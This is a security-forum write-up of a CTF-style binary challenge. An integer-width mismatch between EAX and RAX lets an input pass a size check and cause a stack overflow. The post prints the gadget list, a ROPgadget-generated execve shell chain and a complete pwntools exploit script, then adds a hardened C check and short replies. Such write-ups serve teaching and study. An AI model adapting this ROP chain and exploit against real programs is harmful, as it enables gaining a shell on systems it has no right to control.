[Vulnerability Analysis] An exploit arising from the width difference between registers

kabeo posted on 2020-1-23 22:11
|63..32|31..16|15-8|7-0|
               |AH.|AL.|
               |AX.....|
       |EAX............|
|RAX...................|

The diagram above shows the sizes of the 16-, 32- and 64-bit registers (and the 8-bit halves AH/AL) that overlap inside RAX.

Security checks

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

IDA analysis

There is one piece of junk code (anti-disassembly), so NOP it out first and then read the logic.

The input must be less than or equal to 10 (0xA); otherwise the program exits.

Looking at the assembly

We can see:

eax               0000 000a
rax     0000 0000 0000 000a
rax     0000 0001 0000 000a    a value constructed like this also passes the check

The implicit operation of the cmp instruction is op1 - op2, and the flags then tell whether the result is zero. Because the check is made on the full 64-bit register while the value is later consumed as 32 bits, this can trigger an integer-overflow-like bug.

So if we construct 0x1 0000 0009 - 0xa, the content of eax becomes 0xffff ffff, and the subsequent read of name can read a huge number of bytes, causing a stack overflow.
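As an added illustration (constructed here, not the challenge binary's source, whose exact logic the post only shows in screenshots): a C model of the bug class, consistent with the exploit's input 4294967290 and with the reply below that the variable is 32-bit while the pointer is 64-bit, placed next to a check that does the compare and the length in a single width. LIMIT, NAME_LEN and all function names are hypothetical.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

#define LIMIT    10     /* the challenge's "must be <= 10" rule */
#define NAME_LEN 64u    /* hypothetical size of the stack buffer that read() fills */

/* Vulnerable pattern (constructed): the weight is parsed into a 32-bit signed
 * int (eax), the limit check is a signed compare on that int, and the same int
 * is then widened to the size_t (rax) that read() takes. Returns the count
 * read() would receive, or 0 when the check rejects the input. */
size_t vuln_read_len(const char *input) {
    int32_t weight = (int32_t)strtoull(input, NULL, 10);  /* bits 63..32 dropped */
    if (weight > LIMIT)
        return 0;                 /* the program exits here */
    return (size_t)weight;        /* 4294967290 -> -6 -> 0xffff...fffa bytes */
}

/* Hardened: parse once into an unsigned 64-bit value, reject malformed input and
 * overflow, compare and use the length in that one width, and bind the upper
 * bound to the destination buffer rather than to a loose constant only. */
bool safe_read_len(const char *input, size_t *out) {
    char *end = NULL;
    errno = 0;
    unsigned long long w = strtoull(input, &end, 10);
    if (errno == ERANGE || end == input || (*end != '\0' && *end != '\n'))
        return false;             /* not a clean decimal number */
    if (input[0] == '-')
        return false;             /* strtoull would silently negate "-6" */
    if (w > LIMIT || w > NAME_LEN)
        return false;
    *out = (size_t)w;
    return true;
}

/* Convenience wrapper (hypothetical): SIZE_MAX means "rejected". */
size_t safe_read_len_or_max(const char *input) {
    size_t n = 0;
    return safe_read_len(input, &n) ? n : SIZE_MAX;
}
```

The narrowing cast in vuln_read_len relies on the two's-complement wraparound that gcc and clang document; the hardened version never narrows at all.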

Checking with the file command shows that the program is statically linked:

ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=c69a6b123774b6c538eb99551edd57bc703c32f9, not stripped

The program also contains a syscall instruction, so we use ret2syscall directly for the ROP.

For this challenge the syscall arguments can be set up by hand, or ROPgadget can generate the chain directly:

ROPgadget --binary intoverflow --ropchain

It generates the following:

ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets

    [+] Gadget found: 0x47c601 mov qword ptr [rsi], rax ; ret
    [+] Gadget found: 0x4017b7 pop rsi ; ret
    [+] Gadget found: 0x480956 pop rax ; pop rdx ; pop rbx ; ret
    [+] Gadget found: 0x42660f xor rax, rax ; ret

- Step 2 -- Init syscall number gadgets

    [+] Gadget found: 0x42660f xor rax, rax ; ret
    [+] Gadget found: 0x46ea20 add rax, 1 ; ret
    [+] Gadget found: 0x46ea21 add eax, 1 ; ret

- Step 3 -- Init syscall arguments gadgets

    [+] Gadget found: 0x401696 pop rdi ; ret
    [+] Gadget found: 0x4017b7 pop rsi ; ret
    [+] Gadget found: 0x442e46 pop rdx ; ret

- Step 4 -- Syscall gadget

    [+] Gadget found: 0x4003da syscall

- Step 5 -- Build the ROP chain

    #!/usr/bin/env python2
    # execve generated by ROPgadget

    from struct import pack

    # Padding goes here
    p = ''

    p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ca080) # @ .data
    p += pack('<Q', 0x0000000000480956) # pop rax ; pop rdx ; pop rbx ; ret
    p += '/bin//sh'
    p += pack('<Q', 0x4141414141414141) # padding
    p += pack('<Q', 0x4141414141414141) # padding
    p += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
    p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ca088) # @ .data + 8
    p += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
    p += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret
    p += pack('<Q', 0x0000000000401696) # pop rdi ; ret
    p += pack('<Q', 0x00000000006ca080) # @ .data
    p += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
    p += pack('<Q', 0x00000000006ca088) # @ .data + 8
    p += pack('<Q', 0x0000000000442e46) # pop rdx ; ret
    p += pack('<Q', 0x00000000006ca088) # @ .data + 8
    p += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x000000000046ea20) # add rax, 1 ; ret
    p += pack('<Q', 0x00000000004003da) # syscall

So the exploitation approach is:

  1. Input the constructed number so that the read argument becomes huge
  2. Pad up to the saved return address
  3. Append the ROP chain

exp

from pwn import *
from struct import pack

p = process('./intoverflow')

# 88 bytes of padding reach the saved return address; after it comes the
# ROPgadget-generated execve("/bin//sh", NULL, NULL) chain.
payload  = b'a' * 88
payload += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
payload += pack('<Q', 0x00000000006ca080) # @ .data
payload += pack('<Q', 0x0000000000480956) # pop rax ; pop rdx ; pop rbx ; ret
payload += b'/bin//sh'
payload += pack('<Q', 0x4141414141414141) # padding
payload += pack('<Q', 0x4141414141414141) # padding
payload += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret   ("/bin//sh" -> .data)
payload += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
payload += pack('<Q', 0x00000000006ca088) # @ .data + 8
payload += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
payload += pack('<Q', 0x000000000047c601) # mov qword ptr [rsi], rax ; ret   (NULL terminator -> .data + 8)
payload += pack('<Q', 0x0000000000401696) # pop rdi ; ret
payload += pack('<Q', 0x00000000006ca080) # @ .data                          (rdi = "/bin//sh")
payload += pack('<Q', 0x00000000004017b7) # pop rsi ; ret
payload += pack('<Q', 0x00000000006ca088) # @ .data + 8                      (rsi = argv, points at NULL)
payload += pack('<Q', 0x0000000000442e46) # pop rdx ; ret
payload += pack('<Q', 0x00000000006ca088) # @ .data + 8                      (rdx = envp, points at NULL)
payload += pack('<Q', 0x000000000042660f) # xor rax, rax ; ret
payload += pack('<Q', 0x000000000046ea20) * 59 # add rax, 1 ; ret, 59 times: rax = 59 = execve
payload += pack('<Q', 0x00000000004003da) # syscall

p.recvuntil(b'Plz Input Your weight(kg):\n> ')
p.sendline(b'4294967290')  # passes the <= 10 check yet makes the read length huge
p.recvuntil(b'Good! what\'s your name??\n> ')
p.sendline(payload)

p.interactive()


JuncoJet posted on 2020-1-24 01:25
lea passes an address
mov passes a value
JuncoJet posted on 2020-1-24 01:27
Simply put, the variable you defined is 32-bit, while the pointer is 64-bit.
庞晓晓 posted on 2020-1-24 08:42
eebill posted on 2020-2-11 16:13
Whoa, impressive.
eebill posted on 2020-2-11 16:18
Interesting, very interesting, impressive...
poemrain posted on 2020-2-12 11:32
Notice: the author has been banned or deleted; content automatically hidden.
旧街人字拖 posted on 2020-2-14 21:41
Impressive.....